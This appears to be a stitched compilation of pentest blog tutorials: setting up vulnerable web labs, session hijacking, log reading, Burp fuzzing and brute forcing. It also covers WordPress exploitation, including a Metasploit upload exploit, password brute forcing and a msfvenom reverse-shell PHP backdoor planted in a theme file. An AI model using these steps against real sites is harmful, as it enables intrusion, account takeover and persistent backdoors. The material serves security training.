Step3: cookie with session ID stored on client browser is send back to server where server matches it from database and sends response as HTTP 200 OK.

Image Source: Google Images

Session hijacking

As we know different users have unique session ID when an attacker sniff the session via man-in-middle attack or via XSS and steal session ID or session token this is called session hijacking. When attacker sends the stealing session ID to web server, server match that ID from database stored session ID. If they both matched to each other then the server reply with HTTP 200 OK and attacker get successfully access without submitting proper Identification.

Session hijacking tutorial

For this tutorial I have targeted DVWA, here cookie name is dvwa Session.

Note: session ID for this page will change every time when we will close the browser.

Now capture the browser request using burp suite.

From given image we can see the cookie holds PHPSESSID P38kq30vi6arr0b321p2uv86k0; now send this intercepted data into repeater to observe its response.

In response you can see the highlighted data show set –cookie: dvwaSession =1 more over HTTP 200 OK response from server side.

According to developer each time a new sessionID will generate by server each time, but attacker sniff this session ID P38kq30vi6arr0b321p2uv86k0 for unauthorized login.

Next time we receive another session id when data is intercepted through burp suite i.e. PHPSESSID= gutnu601knp4qsrgfdb4ad0te3, again send this intercepted data into repeater to observe its response.

But before we perceive its response, replace new PHPSESSID from old PHPSESSID.

From given image you can observe we have replaced the SESSION ID and then generate its response in which set –cookie: dvwaSession =6 and HTTP 200 OK response from server side.  

Now change the value inside intercepted data and then forward this request to the server.

Session Vs cookies

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Beginner Guide to Understand Cookies and Session Management appeared first on Hacking Articles.

In our previous article you had learnt how to configure a web server using ubuntu system with the help of LAMP services for designing your own pentest lab. Today you will how to configure the famous 4 web application (DVWA, bWAPP, SQLI and Mutillidae) inside web server for web penetration (WAPT) practices.

Let’s Begin!!

Open the terminal and login with root user and move inside html directory using following command.

sudo bash

cd /var/www/html

Basically to operate all web application on browser through localhost you should download and configure these web application inside html directory only.

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications.

Download dvwa inside html using following command.

wget https://github.com/ethicalhack3r/DVWA/archive/master.zip

Now type following command step by step to configure dvwa.

ls

From given image you can see we have downloaded master.zip file, now unzip this file using below command.

unzip master.zip

After unzip, move file and folder of DVWA-master into dvwa

ls

mv DVWA-master dvwa

ls

cd dvwa

ls

 After then move inside config in order to rename config.inc.php.dist into config.inc.php

cd config/

ls

mv config.inc.php.dist config.inc.php

gedit config.inc.php

Now open config.inc.php using above command, here you will observe that db_password is p@ssw0rd.  But remove the password and left it blank space for db_password.

 After leaving blank password save config.inc.php

Now run web application in browser through URL:  localhost/dvwa/setup.php

As shown in given image a web page will get open for dvwa setup, now click on given tab Create/ Reset Database.

Login into web application through URL: localhost/dvwa/login.php by default the username and password is admin: password respectively for login into dvwa.

Using above step for installation you can configure dvwa in your web server and perform web penetration testing by exploiting given vulnerabilities.

bWAPP

A buggy web application is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.

Now download bwapp and then unzip that folder.

cd /var/www/html

Now shift bwapp from download directory to html directory using move command

mv /home/raj/downloads/bwapp_latest/bwapp .

ls

Now you can observe we have bwapp inside html directories.

Now make following changes inside the file “setting.php” for its configuration.

cd admin

ls

gedit settings.php

Here remove the password “bug” for db_password as done above.

Now Leave blank space for db_password and then save the file.

Now browse web application through URL: localhost/bwapp/install.php

As shown in image a web page will get open for installation; now click on given link “click hereto install wapp”. After that your bwapp will get successfully install and will ready for penetration testing.

Now use default username and password bee: bug for login into bwapp and start your practice.

SQLI

SQLI labs to test error based, Blind boolean based, Time based.

cd /var/www/html

Download SQLI dhakkan inside html directory and then unzip it.

wget https://github.com/Audi-1/sqli-labs.git

unzip master.zip

Copy all file and folder of sqli-labs-master into sqli using following command

mv sqli-labs-master sqli

Now open web application inside browser using URL: localhost/sqli Click on “Setup/reset Database for labs”    

This will create database setup for lab and after that it will be ready for SQL penetration testing. This lab is design for mainly sql injection attack each lesson have different sql error.

OWASP Mutillidae II Web Pen-Test Practice Application

OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. It is pre-installed on SamuraiWTF, Rapid7 Metasploitable-2, and OWASP BWA. The existing version can be updated on these platforms. With dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an “assess the assessor” target for vulnerability assessment software

Download mutillidae using following command

wget https://sourceforge.net/projects/mutillidae/files/latest/download

cd /var/www/html

Move file and folder of mutillidae from inside download into var/www/html by typing following command

mv /home/raj/Downloads/mutillidae

This web application does not required extra configuration setting you can directly open it inside browser using URL: localhost/mutillidae

Now use your pentesting skill to exploit its vulnerability.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Configure Web Application Penetration Testing Lab appeared first on Hacking Articles.

Today we are demonstrating how to install and configure wordpress for penetration testing inside the web server. To configure wordpress, you must install any web host software such as xampp/wamp or read our previous article “Configure Web Server for Penetration Testing (Beginner Guide)” which will help in set up of your own localhost web server. Here we are using our own web server which had configure in ubuntu 14.04.

WordPress is a free and open-source content management system (CMS) based on PHP and MYSQL. It is installed on a web server that is either part of an Internet hosting service or a network host in its own right. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites.

For more detail visit https://en.wikipedia.org/wiki/WordPress

Let’s start!!

If you have read our previous article, then you might be remembering that we had specified blank space as password for root user. Now start with login into phpmyadmin as root user.

phpmyadmin is separated into two parts left and right panels. The left panel contains name of existing databases and right panel contains functional setting for performing maintenance operations on tables, backing up information, editing things and creating or deleting the database.

In order to store wordpress data we need to create a new database. Now click on databases tab given at the top of right panel.

Now enter the name for database system such as wordpress and then click on create. After that you will observe a new database “wordpress” will get add into left panel.

Open the terminal and type following command to download wordpress inside /var/www/html

wget https://wordpress.org/latest.zip

Now unzip the folder of latest.zip

unzip latest.zip

ls

From given image you can see we have folder of wordpress inside /html/ directory.

Now for wordpress installations open it on browser through URL: http:// localhost/wordpress as shown in given image.  At the end of window click on let’s go to proceed for installation.

At another window enter your database connection information such as:

Database Name: wordpress

Username: root

Password: (null)

Database host: localhost

Now click on submit tab.

In next window you will get some code of line to configure wp-config.php file as shown in given image. Now copy the highlighted text into a text document. After you done come back and click on run the install.

As you can see we have pasted above copy text inside a text file and then save it as wp-config.php on desktop.

Since we have saved wp-config.php on desktop therefore we are going to shift it inside /var/www/html/wordpress using following command.

mv /home/raj/Desktop/wp-config.php .

After then go back to previous open tab and click on Run the install.

“Welcome” the new window will come up, now fills the information below and you’ll be on the way for wordpress installation.

Site title: Pentest Lab

Username: admin

Password: password

Email: (your email ID)

At last click on “install wordpress” tab given at the end of window.

Once wordpress will successfully install, click on log in as shown in given image.

Now enter your wordpress credential for login.

Great!!  Finally our web site “pentest lab” is online on localhost server and is ready posting articles and blogs.

 Now we need to add some Plug-in wordpress so that we can make wordpress penetration testing by exploiting these plug-in based vulnerabilities. WordPress’ plug-in architecture allows users to extend the features and functionality of a website or blog.

Now type following command to give all permission to the file and folder own by www-data of /var/www/html.

sudo chown –R www-data /var/www/html

For penetration testing practice we are going to download some vulnerable plug-in so that we have our own vulnerable wordpress site.

We had downloaded a vulnerable plug-in “reflex gallery 3.1.3 arbitrary file upload” found from inside the exploit-db.com, you can download many other vulnerable plug-in from exploit database.

Now login into wordpress as admin to access administration control panel and then select plugins option from dashboard and go for new plugin so that you can add your install plug-in in your wordpress.

Now browse you downloaded zip file and then click on upload plugin for installation.

It will install plug-in into wordpress, now to activate it click on given tab Activate Plugin as shown in given image.

Similarly you can install as much as can be possible vulnerable plug-in into wordpress. You can see we had installed many plug-in inside our wordpress so that we can make more practice on wordpress penetration testing which you will learn in our next upcoming article.

Wait for our next article where you will how exploit wordpress plug-in base vulnerability.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post WordPress Penetration Testing Lab Setup in Ubuntu appeared first on Hacking Articles.

From Wikipedia

Logs

Log files are a standard tool for computer systems developers and administrators. They record the (W5) “what happened when by whom, where and why happened” of the system. This information can record faults and help their diagnosis.

Log Format

The Common Log Format also known as the NCSA Common log format. Each line in a file stored in the Common Log Format has the following syntax:

[host; ident; authuser; date; request; status; bytes]

Example

127.0.0.1 user-identifier raj [30/Aug/2017:10:25:16 -0700] “GET /apache_pb.gif HTTP/1.0” 200 1068

1. A “–” in a field indicates missing data.
2. 0.0.1is the IP address of the client (remote host) which made the request to the server.
3. User-identifieris the RFC 1413 identity of the client.
4. raj is the user id of the person requesting the document.
5. [30/Aug/2017:10:25:16 -0700] is the date, time, and time zone that the request was received
6. “GET /apache_pb.gif HTTP/1.0” is the request line from the client.
7. 200is the HTTP status code returned to the client. 2xx is a successful response, 3xx a redirection, 4xx a client error, and 5xx a server error.
8. 2326is the size of the object returned to the client, measured in bytes

 Importance of log analysis

Logs play an important role in tracking each client computer’s activity and its communication with other computers and networks. Network or system administrator analysis log in order to keep an eye on your network for vulnerabilities that may enter in network to access sensitive information in the form of security attacks. You might be able to identify who introduces risks, and help that person to use better precautions.

Location of log files

Generally in Linux or UNIX system logs are created under /var/log directory, here you will find some very important log file such as: apache, auth, mysql, kernel, bootstrap, dmeg, apt and etc.

Some Important Types of Logs

Application log

The Application log contains events logged by applications or programs. For example, a database program might record a file error in the application log.

Apache: /var/log/apache

Samba:  /var/log/samba

Mail: /var/log/

Mysql:  /var/log/

For Example let’s consider apache log files for analyzing its logs, there are two types of apache http server log files:

• Apache Access Log File

Apache server records all incoming requests and all requests processed to a log file. Location and content of the access log /var/log/apache/access.log.

• Apache Error Log File

All apache errors information those are found during server requests are logged to this file. Location of error log /var/log/apache/error.log.

Now open apache2 log using following command in terminal (UNIX system).

cd apache2

ls

You can see all log files of apache2 as shown in given image.

echo>access.log

Using echo command I had deleted all previous logs from inside access.log file, so that we can read our recent logs for current activity.

As I had described above that apache2 will create logs for client activities on browser. Therefore I had opened some web application like: dvwa, bwapp and wordpress site in respective order and as result in same order log will be created inside apache2.

There are so many command and tools used for log analyzing; among them we had use only three command line utility cat, head and tail for reading logs. 

From given image you can see we have used cat command to read log which begins with dvwa’s log and end on wordpress’s log.

cat is standard UNIX utility use for reading content of file. With help of cat command you can view whole content inside any log file.

Syntax: cat [options] file name

cat access.log

head is a program on UNIX and Unix-like systems used to display the beginning of a text file.

Syntax: head [options] file name

head access.log

By default, head will print the first 10 lines of its input to the standard output. Hence you can option [-n] for specific numbers of line. For example: head – n 30 file name.

tail is a program on UNIX and Unix-like systems used to display the tail end of a text file.

Syntax: tail [options] file name 

tail access.log

From given image you can perceive that it has shown log for wordpress at the end of file.

Significant way of reading logs

Since tail reads end lines of log file which consist information of recent activity of the client therefore we are going to take help tail’s option for reading log in a significant way.

By default, tail will output the last 10 lines of its input to the standard output. Hence you can option [-n] for specific numbers of line. For example: tail – n 30 file name.

tail -n 2 access.log

From given image you can see above command applied filter and read only two logs from recent records.

If you want to read multiple log files simultaneously then type following command.

 tail -n 2 access.log error.log

From given image you can observe that it has shown two-two logs for each i.e. access log and error log.

Now apply filter using grep command with tail command for specific records of log.

Syntax: tail [option] file name | grep “string” [option]

tail access.log | grep 200

From given image you can notice, it has highlighted log having string as 200.  Generally for a network administrator this command will reduce his/her effort while log analyzing because he/she can directly read those log where client or attacker has got successfully response from server.

When server is not able to give reply of request made by client it response through error 404 “not found”.

tail access.log | grep 404

From given image you can see it has highlighted log string 404 from set of log records.

As you known on browser we had browsed web application dvwa, bwapp and wordpress as respective sequences, therefore we get their log in same sequence dvwa log at top; bwapp log at middle and wordpress log at the end of access.log file

Log files are very large, reading them at ones will not possible for administrator therefore he/she can use after and before option with grep as filter for logs.

Syntax: tail [option] file name | grep -A [number of lines] “string”

tail access.log | grep -A 2 “bwapp”

Here -A stand for after, therefore it will filter 2 logs created after bwapp logs and hence it will indicates 2 logs of wordpress as shown in given image.

Similarly apply filter using before parameter and type following command with specific argument.

tail access.log | grep -B 2 “wordpress”

Here -B stand for before, therefore it will filter 2 logs created before wordpress logs and hence it will indicates 2 logs of bwapp as shown in given image.

Auth Log

Auth.log file holds system authorization information; including user login attempts either successful or failure both type of log records as well as authentication method that were used for establishing connection with server, for example SSH login between server and client

Location: /var/log

Again I had used echo command to remove all previous record from inside auth.log

echo>auth.log

Suppose client uses putty for ssh login into server.

If the client having valid credential for ssh then he will get successfully login into server. From given image you can see I had successfully login into server. Hence inside server auth.log file, it will create a new record for SSH login successful.

While in next image you can read access denied message which means fail in login into SSH server. Hence this time inside auth log again a new record will be create for SSH login failure.

Now let‘s read the whole records of auth log file for above client activities using cat command.

cat auth.log

From given image you can read the logs for successful and failure login.

Vsftpd Log

Vsftd log holds system authentication log for FTP login records either successful or failure.

Location: /var/log

I had deleted all previous logs using echo command and using WinSCP for FTP server login. You can observe that we had login successfully. Hence it will create a new record in vsftpd.log for client login successfully.

Now let’s verify it though vsftpd log file and use cat command for reading whole file. From given image you can observe it has created a record in log file for client 192.168.0.104 is CONNECT.

cat vsftpd.log

System Log

syslog is a standard for system logs or  message logging. Administrator may use syslog for system management and security auditing as well as general informational, analysis, and debugging messages. A wide variety of devices, such as printers, routers, and message receivers across many platforms use the syslog standard.

Location: /var/log

Use cat command for reading syslog as shown in given image.

cat syslog

APT Log

The apt is standard command-line tool in UNIX, which works for performing functions such as installation of new software packages, upgrade of existing software packages, updating of the package list index, and even upgrading the entire Ubuntu system.

Location: /var/log

Hence apt contain its own log file for all new and previous installed software. It has two log file as:

• log : /var/log/apt
• log /var/log/apt

Now type following command for reading history log of apt.

cat history.log

From given image you can observe the result which contains information of a software installation and updates.

It was a brief theory for reading logs in simplest way…………………………………………..

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Understanding Log Analysis of Web Server appeared first on Hacking Articles.

From Portswigger

Hello friends!! Today we are going to perform fuzzing testing on bwapp application using burp suite intruder, performing this testing manually is a time consuming and may be boring process for any pentester.

The fuzzing play a vital role in software testing, it is a tool which is use for finding bugs, errors, faults and loophole by injecting a set of partially –arbitrary inputs called fuzz into a program of the application to be tested. Fuzzer tools take structure input in file format to differentiate between valid and invalid inputs. Fuzzer tool are best in identifying vulnerability like sql injection, buffer overflow, xss injection and OS command injection and etc.

Let’s start!!

Fuzzing XSS

 Start burp suite in order to intercept the request and then send intercepted data into Intruder

Many input-based vulnerabilities, such SQL injection, cross-site scripting, and file path traversal can be detected by submitting various test strings in request parameters, and analyzing the application’s responses for error messages and other anomalies.

Considered following as given below:

Configure the position where payload will be inserted, the attack type determine the way in which payloads are assigned to payload positions.

Payload position: test (user input for first name)

Attack type: Sniper (for one payload)

Set payload which will be placed into payload positions during the attack. Choose payload option to configure your simple list of payload for attack. Configure the payload list using one of Burp’s predefined payload lists containing common fuzz strings.

Burp suite intruder contain fuzzing string for testing xss injection, therefore choose fuzzing –xss and click on ADD tab to load this string into simple list as shown in screenshot and at final click on start attack.

It will start attack by sending request which contains random string to test xss vulnerability in the target application. Now from given list of applied string select the payload which has highest length as output as shown in given image, we have select request 1 having length equal to 13926.

Insert selected payload into intercepted request and then forward this request as you can see in given image.

Bravo!!  Fuzzing test is completed and it found that application have bug which lead to xss vulnerability. From screenshot you can see it is showing an xss alert prompt.

Fuzzing OS command injection

Similarly repeat the same process in order to intercept the request and then send intercepted data into Intruder.

Configure the position where payload will be inserted, the attack type determine the way in which payloads are assigned to payload positions.

Payload position: www.nsa.gov (user input for target)

Attack type: Sniper (for one payload

Burp suite intruder contain fuzzing string which will test for os command injection, therefore choose fuzzing full and click on ADD tab to load this string into simple list as shown in screenshot and at final click on start attack.

It will start attack by sending request which contains arbitrary string to test OS command injection vulnerability in the target application. Now from given list of applied string select the payload which has highest length as output as shown in given image, we have select request 34 having length equal to 13343.

Insert selected payload into intercepted request and then forward this request as you can see in given image.

Great Job!!  Fuzzing test is completed and it found that application have bug which lead to OS command vulnerability. From screenshot you can see application is showing ID as per the request of the selected payload.

Fuzzing SQL

Similarly repeat the same process in order to intercept the request and then send intercepted data into Intruder.

Configure the position where payload will be inserted, the attack type determine the way in which payloads are assigned to payload positions. It is much similar like brute force attack.

Payload position: 1:1 (user input for login: password)

Attack type: Cluster bomb (for two payloads)

Burp suite intruder contain fuzzing string which will test for SQL injection, therefore choose fuzzing –SQL Injection for first payload postion and click on ADD tab to load this string into simple list as shown in screenshot and at final click on start attack.

Similarly repeat the same process to set payload option for second payload position.

It will start attack by sending request which contains arbitrary string to test SQL injection vulnerability in the target application. Now from given list of applied string select the payload which has highest length as output as shown in given image, we have select request 168 having length equal to 13648.

Insert selected payload into intercepted request and then forward this request as you can see in given image.

Wonderful!!  Fuzzing test is completed and it found that application have bug which lead to SQL injection vulnerability. From screenshot you can see we had login into Neo’s account without valid input this happens only as per the request of the selected payload.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Fuzzing SQL,XSS and Command Injection using Burp Suite appeared first on Hacking Articles.

In our previous article we had discussed “WordPress Penetration Testing Lab Setup in Ubuntu” and today you will learn wordpress penetration testing using WPScan and Metasploit

Attacker: Kali Linux

Target: WordPress 

WPScan is a black box vulnerability scanner for WordPress written in PHP mainly focus on different types of vulnerability in WordPress, WordPress themes, and plugins. Well, WPScan tool is already installed by default in Kali Linux, SamuraiWTF, Pentoo, BlackArch, and BackBox Linux. WPScanuses the database of all the available plugins and themes (approximately over 18000 plugins and 2600 themes) during testing against the target to find outdated versions and vulnerabilities.

Things WPScan can do for you are:

Detect a version of currently installed WordPress.

-Can detect sensitive files like readme, robots.txt, database replacing files, etc.

-Detect enabled features on currently installed WordPress.

-Enumerate theme version and name.

-Detect installed plugins and can tell you if it is outdated or not.

-Enumerate user names also.

Let’s start.

Go to your Kali Linux terminal and type following to download wpscan from git hub.

cd Desktop

git clone https://github.com/wpscanteam/wpscan.git

Now simply type in terminal to run the script:

./wpscan.rb –h

Using default Option we will are going to penetrate our wordpress website:

Scanning wordpress version of target website

Wpscan is a great tool to scan wordpress websites. Now we will try to do some basic scan, we will use enumerate tools to find information about themes, plugins, usernames etc.

Now type following command to scan wordpress and its server:

./wpscan.rb –u http://192.168.0.101/wordpress/

Instead of http://192.168.0.101/wordpress/ type the name of a website you want to scan. 

Here it found server: Apache/2.4.7, PHP /5.5.9 wordpress version 4.8.1, using this information an attacker can check for its exploit in Google. Moreover it also found that the upload directory has directory listing enable which means anyone can browse the directory /wp-content/uploads to view the uploaded files and contents.

Enumerating wordpress Theme

A theme controls the general look and feel of website including things like page layout, widget locations, and default font and color choices. WordPress.com has a wide range of themes for its user and each theme has an about page that includes features and instructions.

To scan installed theme of wordpress website type following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate t

Enumerating wordpress vulnerable Theme

To scan installed vulnerable theme of wordpress website type following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vt

From scanning result we didn’t find any vulnerable theme which means there is no vulnerable theme which can be exploited.

Enumerating wordpress Plugins

Plugins are small piece of code of a program which can be added to a WordPress website to extend its functionality.

To find installed plugins on our target’s WordPress website, type in terminal:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate p

Finally, after few seconds, you will get result of installed plug-in. You can see that in my scan result askismet v3.3.3, pixabay-images v2.14, wptouch v3.4.3 such types of installed plug-in are detected. As well as it also describe last update and latest version of that plug-in.

Enumerating wordpress vulnerable Plugins

Now type following command to scan vulnerable plug-in of any wordpress website:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vp

After few seconds, you will get result of installed vulnerable plug-in of website. From given image you can observe that the red color indicates vulnerable plug-ins as well as link of exploits CVE.

Exploit vulnerable plug-in using Metasploit

This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

Open the terminal load metasploit framework and execute following command:

use exploit/unix/webapp/wp_reflexgallery_file_upload

msf exploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101

msf exploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/

msf exploit(wp_reflexgallery_file_upload) > exploit

Awesome!! From given image you can observe the meterpreter session of victim’s web server.

meterpreter> sysinfo

Enumerating wordpress Usernames

In order to enumerate user names of wordpress website execute following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate u

After sometime it will dump the table of usernames. In this scan I had found three users with their Id as given below:

ID 1: admin

ID2: ignite

ID: demo

Enumerate ALL with single command

Whatever we have scanned above can be easily enumerate at once by executing given below command:

./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u

Here we had use option –e at –e ap –e u for following reasons:

–e at : enumerate all themes of targeted website

–e ap: enumerate all plugins of targeted website

–e u: enumerate all usernames of targetd website

Brute force attack using Wpscan

With help of username which we had enumerated above we can create a wordlist of password for user admin and can try brute force login attack using given below command.

./wpscan.rb –u http://192.168.0.101/wordpress/ –wordlist /root/Desktop/dict.txt –username admin

It will start matching the valid combination of username and password for login and then dump the result, from given image you can see it found login credential of targeted website as admin:password.

Generate PHP backdoor in wordpress

You can use above credential for login into admin panel where we can upload any theme, taking advantage of admin right we will try to upload malicious script to achieve reverse connection from victim’s system.

Once you are inside admin panel click on Appearance from dashboard and then select option editor.

Now select template 404.php given on the right side of the frame; after that you will found some php code in middle frame for 404 temperate. Erase the entire php code so that you can add malicious php code for generating backdoor inside website as a new theme.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text from *<?php……….die();  further we will past it inside wordpress template as a new theme.

Now past above copied PHP text *<?php……….die();   here as new theme under selected  404.php template.

On other hand Load metasploit framework and start multi/handler

use exploit/multi/handler

 msf exploit(handler) >set payload php/meterpreter/reverse_tcp

msf exploit(handler) >set lhost 192.168.0.107

msf exploit(handler) >4444

msf exploit(handler) >exploit

When you will execute your uploaded theme 404.php in browser you will receive reverse connection at multi/handler and get meterpreter session of victim’s system.

http://192.168.0.101/wordpress/wp-content/themes/twentyseventeen/404.php

Here form screenshot you can see through meterpreter we have access victim’s shell.

meterpreter> sysinfo

In this way using WPSCAN and METASPLOIT admin can check the strength and weakness of wordpress website.

AUTHOR: AkshayBhardwaj is a passionate Hacker, Information Security Enthusiast and Researcher | Sketch Artist |Technical writer.

The post WordPress Penetration Testing using WPScan & Metasploit appeared first on Hacking Articles.

Hello friends!! Today we are discussing about the “Types of Payload in Burp Suite”. Burp Suite is an application which is used for testing Web application security. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. This tool is written in JAVA and is developed by PortSwigger Security. We are going to use the Intruder feature of Burp Suite, it is used to brute force web applications. There are 18 types of payloads in intruder i.e.  

• Simple list
• Runtime File
• Case Modification
• Numbers
• Brute Forcer
• Character substitution
• Custom iterator
• Recursive grep
• Illegal Unicode
• Character blocks
• Dates
• Brute Forcer
• Null Payloads
• Character frober
• Bit Flipper
• Username generator
• ECB block shuffler
• Extension Generated
• Copy other payload

Simple List

This is one of the simple types of payload, as it allows you to configure a short Dictionary of strings which are used as payload.

First, we intercept the request of the login page in the DVWA LAB, where we have given a random username and password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted username and password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack which is the username and password and click on Add button.
• Choose the Attack type as Cluster Bomb.
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

So now, go to Payloads tab and the select 1 from Payload set (this ‘1’ denotes the first file to be selected). Then click on Load button and select your dictionary file for username.

Now select 2 in the Payload set and again give the dictionary file for the password. Select Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the valid combination of username and password and will give you the correct password and username. The moment it will find the correct value, it will change the value of length as shown.

And to confirm the username and password matched, we will give the matched username and password in the DVWA LAB login page. We will see a message “Welcome to the password protected area admin” which shows are success in the simple list payload attack.

Runtime File

This type of payload allows you to configure a file which reads the payload strings at runtime. This type of payload is needed when we require large list of payloads, to avoid holding the entire list in memory. This payload allows you to configure large list of strings which overcomes the simple list payload type.

First, we have intercepted the request of the login page in the DVWA LAB, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload type” as Runtime File and then give the path of dictionary in the “payload options” as /usr/share/wordists/rockyou.txt which is the largest dictionary in Kali Linux. Select Start Attack in the Intruder menu.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Case Modification

This type of payload allows you to configure a list of strings and apply various case modifications to each item on the list. This is useful in password guessing attacks, for generating case variations on dictionary words.

The following case modification rules can be selected:

• No change – The item is used without being modified.
• To lower case – All letters in the item are converted to lower case.
• To upper case – All letters in the item are converted to upper case.
• To Proper name – The first letter in the item is converted to upper case, and the remaining letters are converted to lower case.
• To Proper Name – The first letter in the item is converted to upper case, and the remaining letters are not changed.

For example, if we select all the modification options, then the item “Raj Chandel” will generate the following payloads:

Raj Chandel

raj chandel

RAJ CHANDEL

Raj chandel

First, we intercept the request of the login page in the DVWA LAB, where we have given a random username and a random password. Then click on login , the burp suite will capture the request of the login page in the intercept tab. Send the captured request to the Intruder by right clicking on the space and selecting Send to Intruder option or simply press ctrl + i.

Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload” type as Case Modification, we have selected the No change and to lower case fields in the “payload options” of the case modification as shown in the image. We have added a default Password dictionary from the Add from list field in the payload options. Select Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Numbers

This type of payload generates numeric payloads within a given range and in a specified format.

The following options are available in this payload:

• Number range:

• Type – the type options describes that the numbers should be generated sequentially or randomly.
• From – If numbers are being generated sequentially, this is the value of the first number that will be generated.
• To – If numbers are being generated sequentially, this value of the last number that will be generated. It is said as the highest possible number that may be randomly generated.
• Step – the step option is used when numbers are being generated sequentially and specifies the increment in the successive numbers.
• How many – This option is available when numbers are being generated randomly, and specifies the number of payloads that will be generated

First, we intercept the request of the login page in the Bwapp Lab, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request to the Intruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the Payload type as Numbers where we have set the number range from 100 to 150 and we have set the step as 1 as shown in the image, select Start Attack in the Intruder menu.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

As the password matches with a number which is between the given number range. And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack.

Brute Forcer

This type of payload generates a payload of specified lengths that contain all permutations of list of characters in the given string.

The following options are available:

• Character set – The set of characters to be used in the payloads. Note that the total number of payloads increases exponentially with the size of this set.
• Min length – The length of the shortest payload.

• Max length – The length of the longest payload.

First, we intercept the request of the login page in the Bwapp LAB, where we have given a random username and a random password. Then click on login, the burp suite will capture the request of the login page.

Send the captured request to the Intruder and follow given below step. Now open the Intruder tab then select positions and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the “Payload type” as Brute Forcer where we can give any kind of input into the “character set” as shown in the figure , as we have given 213 and we have set the Min length as 3 and Max length as 3 as shown in the image. We can manually give the Min length and Max length as per your need. Select Start Attack in the Intruder menu as shown in the image.

Now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

Great!! We have used Top 5 payloads of Burpsuite for login page brute force attack successfully.

Note: In this articles (part-1) we will be performing top 5 payload types and the rest of the payload types will be discussed in the (part-2) of this article.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology.

The post Beginners Guide to Burpsuite Payloads (Part 1) appeared first on Hacking Articles.

Burpsuite Decoder can be said as a tool which is used for transforming encoded data into its real form, or for transforming raw data into various encoded and hashed forms. This tool is capable of recognizing several encoding formats using defined techniques. Encoding is the process of putting a sequence of character’s (letters, numbers, punctuation, and symbols) into a specialized format which is used for efficient transmission or storage. Decoding is the opposite process of encoding the conversion of an encoded format back into the original format. Encoding and decoding can be used in data communications, networking, and storage.

